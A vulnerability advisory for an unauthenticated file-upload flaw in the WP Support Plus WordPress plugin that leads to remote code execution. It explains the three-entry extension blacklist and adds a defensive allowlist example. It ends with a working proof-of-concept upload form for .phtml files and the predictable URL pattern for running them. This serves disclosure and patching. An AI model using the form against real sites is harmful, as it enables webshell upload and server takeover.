WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution

2017-11-12T00:00:00
ID WPEX-ID:85D3126A-34A3-4799-A94B-76D7B835DB5F
Type wpexploit
Reporter Robert Mathews
Modified 2020-09-22T08:34:37

Description

WP Support Plus Responsive Ticket System <= 8.0.7 allows anyone to upload PHP files with extensions such as ".phtml", ".php4" and ".php5", all of which are executed as if their extension were ".php" on most hosting platforms. The cause is that "includes/admin/attachment/uploadAttachment.php" rejects uploads by extension blacklist, and the blacklist contains only three entries:

    switch ($extension){
        case 'exe':
        case 'php':
        case 'js':
            $isError=true;
            $errorMessege=__('Error: file format not supported!','wp-support-plus-responsive-ticket-system');

It does not check for other executable extensions like ".phtml". In addition, it saves the file under a predictable name derived from the upload timestamp, so anyone can request the file by URL and run the code it contains. Plugin author notified 2017-11-09.
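The following is an added example, not code from the advisory or from the plugin: it reconstructs the three-entry blacklist described above beside an allowlist check of the kind the fixed plugin needs, and replaces the timestamp-based file name with a random one. The function names, the allowlist contents and the sample file names are assumptions chosen for illustration.

```php
<?php
// Added example (not the plugin's own code): the blacklist check from the
// advisory next to an allowlist check, run over constructed sample filenames.

// Reconstruction of the vulnerable logic: only three extensions are rejected,
// so ".phtml", ".php4", ".php5" and similar pass straight through.
function blacklist_rejects(string $filename): bool {
    $extension = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    switch ($extension) {
        case 'exe':
        case 'php':
        case 'js':
            return true;
    }
    return false;
}

// Hardened check: every dotted segment after the base name must be on a short
// allowlist of attachment types (assumed list; adjust to what tickets need).
const ALLOWED_EXTENSIONS = ['pdf', 'png', 'jpg', 'jpeg', 'gif', 'txt'];

function allowlist_accepts(string $filename): bool {
    $parts = explode('.', strtolower(basename($filename)));
    if (count($parts) < 2 || $parts[0] === '') {
        return false; // no extension at all, or a dotfile such as ".htaccess"
    }
    // Check every extension segment, not just the last one, so that a name
    // like "shell.phtml.png" is rejected as well (some Apache configurations
    // pick a handler from any segment of a multi-extension name).
    foreach (array_slice($parts, 1) as $segment) {
        if (!in_array($segment, ALLOWED_EXTENSIONS, true)) {
            return false;
        }
    }
    return true;
}

// Replacement for the predictable timestamp name: a random name that keeps
// only the already-validated extension, so an uploaded file cannot be located
// by guessing the upload time.
function random_stored_name(string $filename): string {
    $extension = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return bin2hex(random_bytes(16)) . '.' . $extension;
}

// Constructed sample names covering the cases the advisory describes.
$samples = ['report.pdf', 'shell.php', 'shell.phtml', 'shell.php5',
            'shell.phtml.png', '.htaccess', 'README'];
foreach ($samples as $name) {
    printf("%-18s blacklist rejects: %-4s allowlist accepts: %s\n",
        $name,
        blacklist_rejects($name) ? 'yes' : 'no',
        allowlist_accepts($name) ? 'yes' : 'no');
}
echo "report.pdf would be stored as: " . random_stored_name('report.pdf') . "\n";
```

Run with `php example.php`: the blacklist rejects only `shell.php`, while the allowlist accepts only `report.pdf`. Inside WordPress the equivalent built-in check is `wp_check_filetype_and_ext()`, which validates the extension against the site's allowed MIME list and also inspects the file contents; a plugin handling its own uploads should call that rather than maintain a blacklist.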

<form method="post" enctype="multipart/form-data" action="https://example.com/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="wpsp_upload_attachment">
    Choose a file ending with .phtml:
    <input type="file" name="0">
    <input type="submit" value="Submit">
</form>

After doing this, an uploaded file can be accessed at, say:

http://example.com/wp-content/uploads/wpsp/1510248571_filename.phtml